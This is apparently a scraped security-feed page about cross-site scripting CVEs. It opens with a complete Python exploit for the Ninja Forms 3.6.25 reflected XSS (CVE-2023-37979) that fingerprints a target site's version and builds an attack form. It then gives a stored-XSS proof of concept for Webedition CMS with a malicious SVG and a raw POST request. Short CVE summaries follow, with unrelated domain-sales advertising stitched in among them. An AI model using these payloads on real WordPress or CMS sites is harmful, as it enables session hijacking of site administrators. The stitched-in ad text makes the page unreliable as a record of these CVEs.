WordPress Ninja Forms plugin version 3.6.25 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()

WordPress Ninja Forms 3.6.25 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page.

****Acquire** Your Brand**

All of the top Domain Names in one place!  
Accessible by application only. The most complete & curated listing Premium Domains in the World:

\-  Over 1,000 ONE WORD .COM Domains (ex. Bloom.com or Beacon.com)

\-  2 Letter & 3 Letter domains (Ex: EM.com, AIX.com)

\-  High value commercial marketing domains (ex. RentersInsurance.com)

**Apply for access**

Apply to gain access to our  
exclusive curated list of the top 2%  
of domain names in the world.

**Highest Quality**

Over 1,000 ONE WORD domain names  
available for acquisition. Easily search and find your perfect domain name.

**Safe and easy to use**

You can find, negotiate with the  
owner and enter escrow all on  
DNX.com.

**Here are a few hand picked **Premium** and **Brandable** domains available for acquisition.**

**APPLY****01**

Apply for approval to gain access to the DNX.com platform (Free).

**SEARCH****02**

Search over 1,000 ONE WORD domain names.

**SELECT****03**

Quickly communicate with our brokers the domain names that you want to pursue.

**MAKE AN OFFER****04**

Make an offer, start escrow.com and update contracts exclusively on the DNX.com platform.

**Personalized transaction support****05**

Yeah! our world class domain experts always stand by you to support you with your domain transaction even after transaction has been completed.

**So what are******you waiting for**?**

Access to view exclusive premium domain names only on DNX.com

CVE-2023-36159: Premium Domain Broker - DNX.com

Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page.

**www.oxley.com > Domain overview > toll.com**

I'm happy to provide flexible payment options!

Make an offer

Make an offer on

**toll.com**

To make an offer, please complete the form below

Name \*

Email \*

Phone number

Offer Offers can only be made in USD

Message

CVE-2023-36158: toll.com is for sale | www.oxley.com

A Persistent XSS vulnerability can be carried out in a certain field of Unica Campaign.  An attacker could hijack a user's session and perform other attacks.


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-37501: Knowledge Article View HCL - Customer Support

The Foundry Magritte plugin rest-source was found to be vulnerable to an an XML external Entity attack (XXE). 

CVE-2023-30951: Palantir | Trust and Security Portal

A security defect was discovered in Foundry Issues that enabled users to create convincing phishing links by editing the request sent when creating an Issue. This defect was resolved in Frontend release 6.228.0 .

CVE-2023-30952: Palantir | Trust and Security Portal

A security defect was identified in Foundry Frontend that enabled users to potentially conduct DOM XSS attacks if Foundry's CSP were to be bypassed.

This defect was resolved with the release of Foundry Frontend 6.225.0.



CVE-2023-30958: Palantir | Trust and Security Portal

The foundry campaigns service was found to be vulnerable to an unauthenticated information disclosure in a rest endpoint

CVE-2023-30950: Palantir | Trust and Security Portal

A Persistent Cross-site Scripting (XSS) vulnerability can be carried out in a certain field of the Unica Platform.  An attacker could hijack a user's session and perform other attacks.


Tag

#xss